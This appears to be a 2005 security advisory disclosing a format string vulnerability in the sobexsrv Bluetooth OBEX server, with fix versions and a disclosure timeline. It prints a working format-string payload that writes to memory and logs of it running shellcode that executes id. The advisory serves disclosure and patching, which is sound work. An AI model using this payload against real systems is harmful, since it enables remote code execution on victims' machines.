exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DMA-2005-1202a.txt

DMA-2005-1202a.txt
Posted Dec 7, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

DMA[2005-1202a] - sobexsrv is susceptible to a format string vulnerability.

tags | advisory
SHA-256 | 76c84e2bf4e5cd57ebbbffba7467689a561d8e8da82bd825409341907cb1c713

DMA-2005-1202a.txt

Change Mirror Download
DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'
Author: Kevin Finisterre
Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php
Product: 'sobexsrv'
References: http://www.digitalmunition.com/DMA[2005-1202a].txt
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz

Description:
The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then
you will find new entries there...

Over Turkey Day I noticed a blog entry about a 'not really security related but very useful'
Bluetooth application from the trifinite.group. There were actually two new applications but
one jumped out at me right away. One of the apps needed hardware I did not have so I did not
pay much attention to it, sobexsrv however seemed interesting.

sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered
security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory
listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and
security in mind...

Since I truely think Trifinite is pretty hardcore I almost didn't bother looking for bugs in
this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at
cars and shit you can certainly write an OBEX server.

Being lazy I assumed that the examples from the man pages were easy enough to get me started
using the sobexsrv. I quickly found that the first 2 man page examples can be used as examples
for triggering a format string issue.

EXAMPLES
Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp.
sobexsrv -IS -r /tmp

Simple secure setup with chroot and Bluetooth security mode-2.
sobexsrv -s 2 -ISR -l X -r /tmp

In both examples shown above the -S option is used to enable syslog() logging. A format string
issue was located almost immediately in the syslog support for the logging functions. Several
instances of user input are passed to an unformatted syslog() call when using dosyslog().

kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin
./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3)
./src/obexsrv.c:71: syslog(LOG_INFO, log);
...
./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0);
./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0);
./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0);
./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0);
./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0);
./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0);
...

As an example I used a windows machine with the Widcomm bluetooth stack to create a folder named
"--AAAABBBB%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX ftp
interface which worked perfect for a quick verification of the bug.

Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting...
Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242"
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting...
Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected

The host in this example is a PowerPC linux box so keep in mind that the x86 offsets will differ.

This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode
so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push.

kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/
security: mode = 1
REQHINT - add handler for this!
CONNECT start
CONNECT ok, result = 1
CONNECT end
REQDONE
REQHINT - add handler for this!
PUT start
PUT name:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
PUT length: 201
PUT body length: 201
PUT data_type 1
internal_handler: put for
"/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
length=201
PUT ok
PUT end
REQDONE
REQHINT - add handler for this!
DISCONNECT start
DISCONNECT end
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

As you can see we were able to deliver a /bin/sh payload and have the daemon run /usr/bin/id for
us.

This is what things look like from the attackers point of view.

animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl
pushing file /tmp/shellcode
name=/tmp/shellcode, size=201
Registered transport

set user data

created new objext
Local device 00:11:B1:07:BE:A7
Remote device 00:0B:0D:63:0B:CC (1)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file:
%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
path: /tmp/shellcode, size: 201
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!


Workaround:
The Author issued the following temporary warning before patching the problem.
"the syslog (-S) function of sobexsrv is vulerable to a formatstring attack and therefore should
not be used as of now!"

Fixed versions are available at the following locations.
http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz
http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb
http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary)

Note:
This is honestly not that critical of an issue, however it was a fun bug to exploit and it helps
satisfy my Bluetooth fetish. In reality only a handfull of Nokia 770 Tablet PC users and perhaps a
few trifinite.blog users are affected by this issue. Collin made sure this was taken care of very
promptly.

Timeline associated with this bug:
11/03/2005 sobexsrv to trifinite.blog posted by Collin Mulliner
11/23/2005 Turkey Day boredom sets in ... email collin about the find.
11/25/2005 sobexsrv-1.0.0pre4.tar.gz released



Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close